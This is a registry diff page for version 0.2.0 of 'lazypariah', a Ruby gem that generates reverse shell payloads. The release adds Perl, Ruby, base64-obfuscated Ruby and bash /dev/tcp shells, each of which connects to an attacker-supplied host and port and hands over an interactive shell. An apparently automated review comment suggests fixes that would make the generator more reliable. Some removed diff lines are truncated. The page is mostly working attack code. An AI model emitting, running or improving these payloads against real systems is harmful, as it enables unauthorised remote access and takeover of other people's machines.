lazypariah 0.1.1 → 0.2.0
Potentially problematic release.
This version of lazypariah might be problematic. Click here for more details.
- checksums.yaml +4 -4
- data/bin/lazypariah +21 -3
- metadata +5 -5
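--- a/checksums.yaml
+++ b/checksums.yaml
@@ -1,7 +1,7 @@
 ---
 SHA256:
-metadata.gz:
-data.tar.gz:
+metadata.gz: bd291a993c069eed15490793163c44f1a71ffa52a14a5764c100e67e9fd83387
+data.tar.gz: '0589412c913bccca3beff307194761fb0e495fdc2b2bb717e8f817587f294874'
 SHA512:
-metadata.gz:
-data.tar.gz:
+metadata.gz: 18ee080a774d2d8606eb52afbc2c8ece30844a42b1dd9717acb55f9f271c81683a465ac2dcdb9fbbd89c8d4868795ea5131ebd631157d6348e46619ed86270d1
+data.tar.gz: 3ebcd058ab7994a3ed8b59b1b0c4df41779c0b349b143c0eac6913e1e71ad7c878f25d9cbe6f71e7a281b0fce707c108cb05dc66929367ffde2905196bddf060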
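--- a/data/bin/lazypariah
+++ b/data/bin/lazypariah
@@ -1,7 +1,7 @@
 #!/usr/bin/env ruby
 #
 # Title: LAZYPARIAH
-# Version: 0.
+# Version: 0.2.0
 # Description:
 # LAZYPARIAH is a simple tool for generating various reverse shell payloads
 # on the fly. It is intended to be used only in authorised circumstances by
@@ -27,7 +27,7 @@ require "erb"
 
 # Define constants.
 PROGRAM_NAME = "LAZYPARIAH".freeze()
-PROGRAM_VERSION = "0.
+PROGRAM_VERSION = "0.2.0".freeze()
 EXECUTABLE_NAME = "lazypariah".freeze()
 
 # Define payload list.
@@ -53,7 +53,12 @@ PAYLOAD_LIST = [
 "php_fd_4_tags",
 "php_fd_5_tags",
 "php_fd_6_tags",
-"
+"perl",
+"perl_c",
+"ruby",
+"ruby_c",
+"ruby_b64",
+"bash_tcp"
 ].sort()
 
 # Define function for displaying program information.
@@ -184,6 +189,19 @@ begin
 print_output("<?php $sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&5 >&5 2>&5\");?>", url_encode=url_encode)
 when "php_fd_6_tags"
 print_output("<?php $sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&6 >&6 2>&6\");?>", url_encode=url_encode)
+when "perl"
+print_output("use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};", url_encode=url_encode)
+when "perl_c"
+print_output("perl -e 'use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'", url_encode=url_encode)
+when "ruby"
+print_output("require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end", url_encode=url_encode)
+when "ruby_c"
+print_output("ruby -e 'require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'", url_encode=url_encode)
+when "ruby_b64"
+code = Base64.strict_encode64("require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end")
+print_output("echo #{code} | base64 -d | ruby", url_encode=url_encode)
+when "bash_tcp"
+print_output("bash -i >& /dev/tcp/#{ARGV[1]}/#{ARGV[2]} 0>&1", url_encode=url_encode)
 end
 end
 end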
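Review bot: The new `ruby_b64` branch calls `Base64.strict_encode64`, but the only require visible in this section is `require "erb"` in a hunk header, so confirm that `require "base64"` sits with the other requires; without it the branch raises NameError. `ARGV[1]` and `ARGV[2]` are also interpolated unchecked into every new payload string, and `perl`/`perl_c` emit the port unquoted (`$p=#{ARGV[2]}`), so unless the `begin` block (which starts outside the hunk) already validates them, a guard such as `port = Integer(ARGV[2], exception: false)` plus a `(1..65535).cover?(port)` test before the `case` would stop a mistyped argument from producing malformed output. On style, `url_encode=url_encode` is a positional argument wrapped in a self-assignment rather than a keyword argument, and the Ruby one-liner is repeated in three branches where one local would keep them in sync.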
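--- a/metadata
+++ b/metadata
@@ -1,14 +1,14 @@
 --- !ruby/object:Gem::Specification
 name: lazypariah
 version: !ruby/object:Gem::Version
-version: 0.
+version: 0.2.0
 platform: ruby
 authors:
 - Peter Funnell
-autorequire:
+autorequire:
 bindir: bin
 cert_chain: []
-date: 2020-11-
+date: 2020-11-22 00:00:00.000000000 Z
 dependencies: []
 description: LAZYPARIAH is a simple tool for generating a range of reverse shell payloads
 on the fly. It is intended to be used only in authorised circumstances by qualified
@@ -27,7 +27,7 @@ homepage: https://github.com/octetsplicer/LAZYPARIAH
 licenses:
 - GPL-3.0+
 metadata: {}
-post_install_message:
+post_install_message:
 rdoc_options: []
 require_paths:
 - lib
@@ -44,7 +44,7 @@ required_rubygems_version: !ruby/object:Gem::Requirement
 requirements:
 - A GNU/Linux or BSD operating system.
 rubygems_version: 3.1.2
-signing_key:
+signing_key:
 specification_version: 4
 summary: A tool for generating reverse shell payloads on the fly.
 test_files: []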